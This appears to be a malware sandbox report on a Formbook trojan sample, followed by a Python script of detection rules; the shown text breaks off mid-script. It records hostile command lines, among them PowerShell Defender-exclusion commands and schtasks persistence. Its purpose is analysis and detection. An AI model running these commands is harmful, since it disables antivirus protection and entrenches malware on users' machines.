Source: 00000013.00000002.626660475.0000000000220000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000F.00000002.626744301.0000000002980000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.419884828.0000000001490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: ekte.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: eFDiSxeTfjUqTk.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.ekte.exe.3ae7ae0.5.raw.unpack, GU2SbFu6vnjS2UV3A6.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.ekte.exe.3ae7ae0.5.raw.unpack, GU2SbFu6vnjS2UV3A6.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.ekte.exe.67b0000.6.raw.unpack, GU2SbFu6vnjS2UV3A6.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.ekte.exe.67b0000.6.raw.unpack, GU2SbFu6vnjS2UV3A6.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.ekte.exe.3ae7ae0.5.raw.unpack, fQtca1ae8ISaTu4jS6.cs Security API names: _0020.SetAccessControl
Source: 0.2.ekte.exe.3ae7ae0.5.raw.unpack, fQtca1ae8ISaTu4jS6.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.ekte.exe.3ae7ae0.5.raw.unpack, fQtca1ae8ISaTu4jS6.cs Security API names: _0020.AddAccessRule
Source: 0.2.ekte.exe.3b6fb00.4.raw.unpack, fQtca1ae8ISaTu4jS6.cs Security API names: _0020.SetAccessControl
Source: 0.2.ekte.exe.3b6fb00.4.raw.unpack, fQtca1ae8ISaTu4jS6.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.ekte.exe.3b6fb00.4.raw.unpack, fQtca1ae8ISaTu4jS6.cs Security API names: _0020.AddAccessRule
Source: 0.2.ekte.exe.67b0000.6.raw.unpack, fQtca1ae8ISaTu4jS6.cs Security API names: _0020.SetAccessControl
Source: 0.2.ekte.exe.67b0000.6.raw.unpack, fQtca1ae8ISaTu4jS6.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.ekte.exe.67b0000.6.raw.unpack, fQtca1ae8ISaTu4jS6.cs Security API names: _0020.AddAccessRule
Source: 0.2.ekte.exe.3b6fb00.4.raw.unpack, GU2SbFu6vnjS2UV3A6.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.ekte.exe.3b6fb00.4.raw.unpack, GU2SbFu6vnjS2UV3A6.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@24/19@12/6
Source: C:\Users\user\Desktop\ekte.exe File created: C:\Users\user\AppData\Local\GDIPFONTCACHEV1.DAT
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
Source: C:\Users\user\Desktop\ekte.exe File created: C:\Users\user\AppData\Local\Temp\tmp47BA.tmp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P........................................................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P........................................................s..............D.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P........................................................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P........................................................s..............D.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P............................."..........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P........................................................s..............D.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................a.g.a.i.n...............................@..........................s..............D.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............................L..........................s..............D.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.........^..........................s..............D..... .......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............................j..........................s..............D.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............................|..........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P........................................................s..............D.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~................................s..............D.....$.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P........................................................s..............D.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P........................................................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P........................................................s..............D.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s..............D.....2.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P........................................................s..............D.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P........................................................s....................l.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P........................................................s..............D.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................ .......(.P........................................................s..............D.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P........................................................s..............D.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............(...............<..........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............(.......x.......M..........................s............(.).............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............(.......x.......`..........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............(.......x.......l..........................s............(.).............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............(.......P..................................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............(..........................................s............(.).............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................a.g.a.i.n...............(..........................................s............(.).............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............(..........................................s............(.).............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1....................................s............(.)..... .......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............(..........................................s............(.).............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............(..........................................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............(..........................................s............(.).............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~................................s............(.).....$.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............(.......x........ .........................s............(.).............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............(.......x........ .........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............(.......x.......& .........................s............(.).............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s............(.).....2.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............(.......x.......D .........................s............(.).............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............(.......x.......W .........................s....................l.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............(.......x.......c .........................s............(.).............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................ .......(.P.............(.......x.......u .........................s............(.).............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............(.......x........ .........................s............(.).............................
Source: C:\Windows\SysWOW64\schtasks.exe Console Write: ................P.......................(.P.....4.......\.......................................................................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ..).....................................(.P..............................P.........................s..............).............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P..............................P.........................s............(.................).............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ..).....................................(.P..............................P.........................s..............).............(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P..............................Q.........................s............(.................).............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ..).....................................(.P.............................!Q.........................s..............).............(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............................-Q.........................s............(.................).............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................a.g.a.i.n...............................?Q.........................s............(...............(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............................KQ.........................s............(...............(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.........]Q.........................s............(....... .......(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............................iQ.........................s............(...............(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ..).....................................(.P.............................{Q.........................s..............).............(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P..............................Q.........................s............(.................).............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~......Q.........................s............(.......$.......(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P..............................Q.........................s............(...............(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ..).....................................(.P..............................Q.........................s..............).............(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P..............................Q.........................s............(.................).............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s............(.......2.......(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P..............................Q.........................s............(...............(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ..).....................................(.P..............................Q.........................s..............).....l.......(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P..............................R.........................s............(.................).............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................ .......(.P..............................R.........................s............(...............(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P..............................R.........................s............(...............(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P..............................N.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P..............................O.........................s............H...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P..............................O.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P............................."O.........................s............H...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............................5O.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............................AO.........................s............H...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................a.g.a.i.n...............................SO.........................s............H...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P............................._O.........................s............H...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.........qO.........................s............H....... .......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............................}O.........................s............H...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P..............................O.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P..............................O.........................s............H...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~......O.........................s............H.......$.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P..............................O.........................s............H...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P..............................O.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P..............................O.........................s............H...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s............H.......2.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P..............................O.........................s............H...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P..............................P.........................s....................l.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P..............................P.........................s............H...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................ .......(.P.............................%P.........................s............H...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............................1P.........................s............H...............................
Source: C:\Windows\SysWOW64\schtasks.exe Console Write: ................................E.R.R.O.R.:. ...................@........E...................................................................... Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Console Write: ................................E.R.R.O.(.P.....................@........E..............................................j....................... Jump to behavior
Source: ekte.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: ekte.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\Users\user\Desktop\ekte.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: findstr.exe, 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmp, sqlite3.dll.19.dr Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: findstr.exe, 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmp, sqlite3.dll.19.dr Binary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
Source: findstr.exe, 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmp, sqlite3.dll.19.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: findstr.exe, 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmp, sqlite3.dll.19.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: findstr.exe, 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmp, sqlite3.dll.19.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: findstr.exe, 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmp, sqlite3.dll.19.dr Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: findstr.exe, 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmp, sqlite3.dll.19.dr Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: findstr.exe, 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmp, sqlite3.dll.19.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: findstr.exe, 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmp, sqlite3.dll.19.dr Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: ekte.exe ReversingLabs: Detection: 63%
Source: C:\Users\user\Desktop\ekte.exe File read: C:\Users\user\Desktop\ekte.exe:Zone.Identifier Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\ekte.exe "C:\Users\user\Desktop\ekte.exe"
Source: C:\Users\user\Desktop\ekte.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ekte.exe"
Source: C:\Users\user\Desktop\ekte.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe"
Source: C:\Users\user\Desktop\ekte.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eFDiSxeTfjUqTk" /XML "C:\Users\user\AppData\Local\Temp\tmp47BA.tmp"
Source: C:\Users\user\Desktop\ekte.exe Process created: C:\Users\user\Desktop\ekte.exe "C:\Users\user\Desktop\ekte.exe"
Source: unknown Process created: C:\Windows\System32\taskeng.exe taskeng.exe {F5042694-6DBB-4431-8D77-CD30DFD414D8} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
Source: C:\Windows\System32\taskeng.exe Process created: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe"
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe"
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eFDiSxeTfjUqTk" /XML "C:\Users\user\AppData\Local\Temp\tmp1A06.tmp"
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Process created: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe "C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe"
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe Process created: C:\Windows\SysWOW64\findstr.exe "C:\Windows\SysWOW64\findstr.exe"
Source: C:\Windows\SysWOW64\findstr.exe Process created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"
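The process chain listed above (Defender exclusions added through Add-MpPreference, a scheduled task created from an XML file in the user's Temp directory, the sample re-launching a copy of itself before unpacking, and findstr.exe launching Firefox after the injection into BuhvZTwGQCD.exe) is the part of this report that most directly converts into detection logic. The following Python is an added example, not code from the report or from Joe Sandbox: it encodes those four behaviours as rules and runs them over process-creation events constructed from the command lines recorded above. The explorer.exe parent of the first ekte.exe launch, the two benign control events at the end and the INJECTION_TARGETS list are assumptions.

```python
"""Triage rules for the process chain above, run over constructed events."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    parent: str    # full path of the creating process (Sysmon ParentImage)
    image: str     # full path of the created process (Sysmon Image)
    cmdline: str   # CommandLine


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


# Locations a standard user can write to; persistence or exclusions set up
# from here deserve more suspicion than the same action from Program Files.
USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\(Desktop|AppData|Downloads)\\", re.I)
TEMP_DIR = re.compile(r"\\AppData\\Local\\Temp\\|\\Windows\\Temp\\", re.I)
BROWSERS = {"firefox.exe", "chrome.exe", "msedge.exe", "iexplore.exe"}
# Assumed starting list: system utilities with no reason to launch a browser.
# findstr.exe is the one this sample hollowed; extend it for your own estate.
INJECTION_TARGETS = {"findstr.exe"}


def defender_exclusion(ev: ProcEvent) -> bool:
    """powershell.exe adding a Defender exclusion (Add-MpPreference -Exclusion*)."""
    return (basename(ev.image) == "powershell.exe"
            and re.search(r"\bAdd-MpPreference\b", ev.cmdline, re.I) is not None
            and re.search(r"-Exclusion(Path|Process|Extension)\b", ev.cmdline, re.I) is not None)


def task_from_temp_xml(ev: ProcEvent) -> bool:
    """schtasks /Create whose task definition is an XML file under a temp directory."""
    cl = ev.cmdline.lower()
    return (basename(ev.image) == "schtasks.exe" and "/create" in cl and "/xml" in cl
            and TEMP_DIR.search(ev.cmdline) is not None)


def self_spawn_from_user_path(ev: ProcEvent) -> bool:
    """A binary in a user-writable path launching a second copy of itself,
    the usual prelude to unpacking into (hollowing) that child."""
    return ev.image.lower() == ev.parent.lower() and USER_WRITABLE.search(ev.image) is not None


def utility_spawns_browser(ev: ProcEvent) -> bool:
    """A hollowed system utility starting a browser to harvest its credential stores."""
    return basename(ev.parent) in INJECTION_TARGETS and basename(ev.image) in BROWSERS


RULES = {f.__name__: f for f in (defender_exclusion, task_from_temp_xml,
                                 self_spawn_from_user_path, utility_spawns_browser)}


def triage(events):
    """Return (rule, parent, image) for every rule that fires on every event."""
    return [(name, basename(ev.parent), basename(ev.image))
            for ev in events for name, rule in RULES.items() if rule(ev)]


PS = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
PS_CMD = r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath '
EKTE = r"C:\Users\user\Desktop\ekte.exe"
DROP = r"C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe"
HOST = r"C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe"

# Constructed events using the command lines from the report; the explorer.exe
# parent of the first launch and the two benign controls at the end are assumed.
EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe", EKTE, f'"{EKTE}"'),
    ProcEvent(EKTE, PS, PS_CMD + f'"{EKTE}"'),
    ProcEvent(EKTE, PS, PS_CMD + f'"{DROP}"'),
    ProcEvent(EKTE, r"C:\Windows\SysWOW64\schtasks.exe",
              r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eFDiSxeTfjUqTk" '
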